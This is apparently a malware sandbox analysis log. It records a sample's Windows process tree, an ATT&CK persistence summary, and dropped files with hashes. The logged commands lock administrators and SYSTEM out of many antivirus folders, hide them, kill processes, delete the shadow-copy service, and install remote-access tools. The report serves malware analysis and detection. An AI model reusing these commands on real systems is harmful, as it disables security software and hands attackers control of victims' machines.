C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Администраторы:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
- Drops file in Drivers directory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F
- Kills process with taskkill
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM iediagcmd.exe /T /F
- Kills process with taskkill
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\speechstracing" /deny system:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny System:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\360\Total Security"
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\360\Total Security" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360TotalSecurity
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\360safe
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360TotalSecurity" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\Avira
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Package Cache"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Package Cache" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\ESET"
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\ProgramData\ESET
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\AVAST Software\Avast"
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software\Avast" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\AVAST Software"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\Kaspersky Lab Setup Files"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab Setup Files" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\AdwCleaner"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\AdwCleaner" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Program Files\Malwarebytes\Anti-Malware"
- Drops file in Program Files directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes\Anti-Malware" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "c:\programdata\Malwarebytes"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\Malwarebytes" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\Programdata\MB3Install"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\MB3Install" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\KVRT_Data"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\KVRT_Data" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Norton"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Avg"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avg" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\grizzly"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Doctor Web"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Indus"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Indus" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\WINDOWS\McMwt"
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\McMwt" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass2.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\timeout.exetimeout 1
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\lsass.exe" /deny System:(OI)(CI)(F)
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny └Σ∞ΦφΦ±≥≡α≥ε≡√:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\windows\boy.exe" /deny System:(OI)(CI)(F)
- Modifies file permissions
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Intel"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Check"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S "C:\ProgramData\Microsoft\Temp"
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv
-
C:\Windows\SysWOW64\sc.exesc delete swprv
-
C:\ProgramData\Windows\rutserv.exeC:\ProgramData\Windows\rutserv.exe
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe
- Executes dropped EXE
-
C:\ProgramData\Windows\rfusclient.exeC:\ProgramData\Windows\rfusclient.exe /tray
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
3Hidden Files and Directories
3Account Manipulation
1Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\System\iediagcmd.exe
-
C:\Program Files\Common Files\System\iexplore.exe
-
C:\ProgramData\Microsoft\Intel\BLOCK.bat
-
C:\ProgramData\Microsoft\Intel\R8.exe
-
C:\ProgramData\Microsoft\Intel\taskhost.exe
-
C:\ProgramData\Microsoft\Intel\taskhost.exe
-
C:\ProgramData\Microsoft\Intel\wini.exe
-
C:\ProgramData\Microsoft\Intel\wini.exe
-
C:\ProgramData\RealtekHD\taskhostw.exe
-
C:\ProgramData\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\ProgramData\Windows\install.vbs
-
C:\ProgramData\Windows\reg1.reg
-
C:\ProgramData\Windows\reg2.reg
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rfusclient.exeMD5
b8667a1e84567fcf7821bcefb6a444af
SHA19c1f91fe77ad357c8f81205d65c9067a270d61f0
SHA256dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9
SHA512ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\rutserv.exeMD5
37a8802017a212bb7f5255abc7857969
SHA1cb10c0d343c54538d12db8ed664d0a1fa35b6109
SHA2561699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6
SHA5124e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0
-
C:\ProgramData\Windows\vp8decoder.dllMD5
88318158527985702f61d169434a4940
SHA13cc751ba256b5727eb0713aad6f554ff1e7bca57
SHA2564c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74
SHA5125d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff
-
C:\ProgramData\Windows\vp8encoder.dllMD5
6298c0af3d1d563834a218a9cc9f54bd
SHA10185cd591e454ed072e5a5077b25c612f6849dc9
SHA25681af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172
SHA512389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe
-
C:\ProgramData\Windows\winit.exe
-
C:\ProgramData\Windows\winit.exe
-
C:\ProgramData\install\cheat.exe
-
C:\ProgramData\install\sys.exe
-
C:\ProgramData\install\sys.exeMD5
bfa81a720e99d6238bc6327ab68956d9
SHA1c7039fadffccb79534a1bf547a73500298a36fa0
SHA256222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f
SHA5125ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab
-
C:\Programdata\Install\del.bat
-
C:\Programdata\RealtekHD\taskhostw.exe
-
C:\Programdata\WindowsTask\winlogon.exeMD5
ec0f9398d8017767f86a4d0e74225506
SHA1720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36
SHA256870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375
SHA512d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484
-
C:\Programdata\Windows\install.bat
-
C:\Programdata\kz.exe
-
C:\Programdata\lsass.exe
-
C:\Programdata\lsass2.exe
-
C:\Programdata\olly.exe
-
C:\Programdata\script.exe
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C20E0DA2D0F89FE526E1490F4A2EE5AB
-
C:\Windows\SysWOW64\drivers\conhost.exe
-
C:\Windows\boy.exe
-
C:\Windows\java.exe
-
C:\programdata\install\cheat.exe
-
C:\programdata\microsoft\intel\R8.exe
-
C:\programdata\microsoft\temp\H.bat
-
C:\programdata\microsoft\temp\Temp.bat
-
C:\rdp\RDPWInst.exe
-
C:\rdp\RDPWInst.exe
-
C:\rdp\RDPWInst.exe
-
C:\rdp\Rar.exe
-
C:\rdp\Rar.exe
-
C:\rdp\bat.bat
-
C:\rdp\db.rar
-
C:\rdp\install.vbs
-
C:\rdp\pause.bat
-
C:\rdp\run.vbs
-
\??\PIPE\RManFUSCallbackNotify32
-
\??\PIPE\RManFUSCallbackNotify32
-
\??\c:\program files\rdp wrapper\rdpwrap.dll
-
\??\c:\program files\rdp wrapper\rdpwrap.ini
-
\??\c:\windows\svchost.exe
-
\Program Files\RDP Wrapper\rdpwrap.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\mozglue.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\msvcp140.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\nss3.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll
-
\Users\Admin\AppData\Local\Temp\4210A729\vcruntime140.dll
-
memory/204-565-0x0000000000000000-mapping.dmp
-
memory/348-393-0x0000000000000000-mapping.dmp
-
memory/356-38-0x0000000000000000-mapping.dmp
-
memory/388-397-0x0000000000000000-mapping.dmp
-
memory/396-88-0x0000000000000000-mapping.dmp
-
memory/400-534-0x0000000000000000-mapping.dmp
-
memory/504-445-0x0000000000000000-mapping.dmp
-
memory/744-521-0x0000000000000000-mapping.dmp
-
memory/748-220-0x0000000000000000-mapping.dmp
-
memory/752-109-0x0000000000000000-mapping.dmp
-
memory/756-69-0x0000000000000000-mapping.dmp
-
memory/760-52-0x0000000000000000-mapping.dmp
-
memory/812-76-0x0000000000000000-mapping.dmp
-
memory/816-504-0x0000000000000000-mapping.dmp
-
memory/820-93-0x0000000000000000-mapping.dmp
-
memory/864-221-0x0000000000000000-mapping.dmp
-
memory/868-243-0x0000000000000000-mapping.dmp
-
memory/888-178-0x0000000000000000-mapping.dmp
-
memory/1004-111-0x0000000000000000-mapping.dmp
-
memory/1012-310-0x0000000000000000-mapping.dmp
-
memory/1028-64-0x0000000000000000-mapping.dmp
-
memory/1036-159-0x0000000000000000-mapping.dmp
-
memory/1120-528-0x0000000000000000-mapping.dmp
-
memory/1140-187-0x0000000000000000-mapping.dmp
-
memory/1164-551-0x0000000000000000-mapping.dmp
-
memory/1312-440-0x0000000000000000-mapping.dmp
-
memory/1372-114-0x0000000000000000-mapping.dmp
-
memory/1444-353-0x0000000000000000-mapping.dmp
-
memory/1456-509-0x0000000000000000-mapping.dmp
-
memory/1500-90-0x0000000000000000-mapping.dmp
-
memory/1504-531-0x0000000000000000-mapping.dmp
-
memory/1524-4-0x0000000000000000-mapping.dmp
-
memory/1528-22-0x0000000000000000-mapping.dmp
-
memory/1532-115-0x0000000000000000-mapping.dmp
-
memory/1544-62-0x0000000000000000-mapping.dmp
-
memory/1560-479-0x0000000000000000-mapping.dmp
-
memory/1596-405-0x0000000000000000-mapping.dmp
-
memory/1616-559-0x0000000000000000-mapping.dmp
-
memory/1624-266-0x0000000000000000-mapping.dmp
-
memory/1704-501-0x0000000000000000-mapping.dmp
-
memory/1816-562-0x0000000000000000-mapping.dmp
-
memory/1836-23-0x0000000000000000-mapping.dmp
-
memory/1872-103-0x0000000000000000-mapping.dmp
-
memory/1932-124-0x0000000000000000-mapping.dmp
-
memory/1968-77-0x0000000000000000-mapping.dmp
-
memory/2032-105-0x0000000000000000-mapping.dmp
-
memory/2036-106-0x0000000000000000-mapping.dmp
-
memory/2060-89-0x0000000000000000-mapping.dmp
-
memory/2100-441-0x0000000000000000-mapping.dmp
-
memory/2116-101-0x0000000000000000-mapping.dmp
-
memory/2132-399-0x0000000000000000-mapping.dmp
-
memory/2148-108-0x0000000000000000-mapping.dmp
-
memory/2164-57-0x0000000000000000-mapping.dmp
-
memory/2176-463-0x0000000000000000-mapping.dmp
-
memory/2180-72-0x0000000000000000-mapping.dmp
-
memory/2192-587-0x0000000000000000-mapping.dmp
-
memory/2204-172-0x0000000000000000-mapping.dmp
-
memory/2208-27-0x0000000000000000-mapping.dmp
-
memory/2220-110-0x0000000000000000-mapping.dmp
-
memory/2236-122-0x0000000000000000-mapping.dmp
-
memory/2240-61-0x0000000000000000-mapping.dmp
-
memory/2248-236-0x0000000000000000-mapping.dmp
-
memory/2260-158-0x0000000000000000-mapping.dmp
-
memory/2276-461-0x0000000000000000-mapping.dmp
-
memory/2288-201-0x0000000000000000-mapping.dmp
-
memory/2348-123-0x0000000000000000-mapping.dmp
-
memory/2356-457-0x0000000000000000-mapping.dmp
-
memory/2404-566-0x0000000000000000-mapping.dmp
-
memory/2408-71-0x0000000000000000-mapping.dmp
-
memory/2544-75-0x0000000000000000-mapping.dmp
-
memory/2572-195-0x0000000000000000-mapping.dmp
-
memory/2616-40-0x0000000000000000-mapping.dmp
-
memory/2620-367-0x0000000000000000-mapping.dmp
-
memory/2668-503-0x0000000000000000-mapping.dmp
-
memory/2720-160-0x0000000000000000-mapping.dmp
-
memory/2732-369-0x0000000000000000-mapping.dmp
-
memory/2832-408-0x0000000000000000-mapping.dmp
-
memory/2844-333-0x0000000000000000-mapping.dmp
-
memory/2860-451-0x0000000000000000-mapping.dmp
-
memory/2864-547-0x0000000000000000-mapping.dmp
-
memory/2928-53-0x0000000000000000-mapping.dmp
-
memory/2928-59-0x0000000002F10000-0x0000000002F11000-memory.dmpFilesize
4KB
-
memory/2928-60-0x0000000003710000-0x0000000003711000-memory.dmpFilesize
4KB
-
memory/2932-263-0x0000000000000000-mapping.dmp
-
memory/3028-28-0x0000000000000000-mapping.dmp
-
memory/3032-0-0x0000000000000000-mapping.dmp
-
memory/3124-63-0x0000000000000000-mapping.dmp
-
memory/3152-507-0x0000000000000000-mapping.dmp
-
memory/3156-529-0x0000000000000000-mapping.dmp
-
memory/3160-97-0x0000000000000000-mapping.dmp
-
memory/3220-577-0x0000000000000000-mapping.dmp
-
memory/3224-100-0x0000000000000000-mapping.dmp
-
memory/3304-17-0x0000000000000000-mapping.dmp
-
memory/3308-112-0x0000000000000000-mapping.dmp
-
memory/3312-66-0x0000000000000000-mapping.dmp
-
memory/3312-116-0x0000000000000000-mapping.dmp
-
memory/3356-81-0x0000000000000000-mapping.dmp
-
memory/3404-86-0x0000000000000000-mapping.dmp
-
memory/3412-107-0x0000000000000000-mapping.dmp
-
memory/3464-67-0x0000000000000000-mapping.dmp
-
memory/3468-120-0x0000000000000000-mapping.dmp
-
memory/3540-538-0x0000000000000000-mapping.dmp
-
memory/3548-25-0x0000000000000000-mapping.dmp
-
memory/3584-478-0x0000000000000000-mapping.dmp
-
memory/3676-242-0x0000000000000000-mapping.dmp
-
memory/3712-376-0x0000000000000000-mapping.dmp
-
memory/3792-570-0x0000000000000000-mapping.dmp
-
memory/3812-113-0x0000000000000000-mapping.dmp
-
memory/3824-436-0x0000000000000000-mapping.dmp
-
memory/3840-87-0x0000000000000000-mapping.dmp
-
memory/3844-361-0x0000000000000000-mapping.dmp
-
memory/3848-117-0x0000000000000000-mapping.dmp
-
memory/3856-254-0x0000000000000000-mapping.dmp
-
memory/3860-36-0x0000000002FC0000-0x0000000002FC1000-memory.dmpFilesize
4KB
-
memory/3860-34-0x0000000002FC0000-0x0000000002FC1000-memory.dmpFilesize
4KB
-
memory/3860-31-0x0000000000000000-mapping.dmp
-
memory/3860-35-0x00000000037C0000-0x00000000037C1000-memory.dmpFilesize
4KB
-
memory/3868-125-0x0000000000000000-mapping.dmp
-
memory/3872-319-0x0000000000000000-mapping.dmp
-
memory/3916-58-0x0000000000000000-mapping.dmp
-
memory/3924-402-0x0000000000000000-mapping.dmp
-
memory/3928-65-0x0000000000000000-mapping.dmp
-
memory/4004-585-0x0000000000000000-mapping.dmp
-
memory/4008-539-0x0000000000000000-mapping.dmp
-
memory/4032-54-0x0000000000000000-mapping.dmp
-
memory/4048-85-0x0000000000000000-mapping.dmp
-
memory/4084-267-0x0000000000000000-mapping.dmp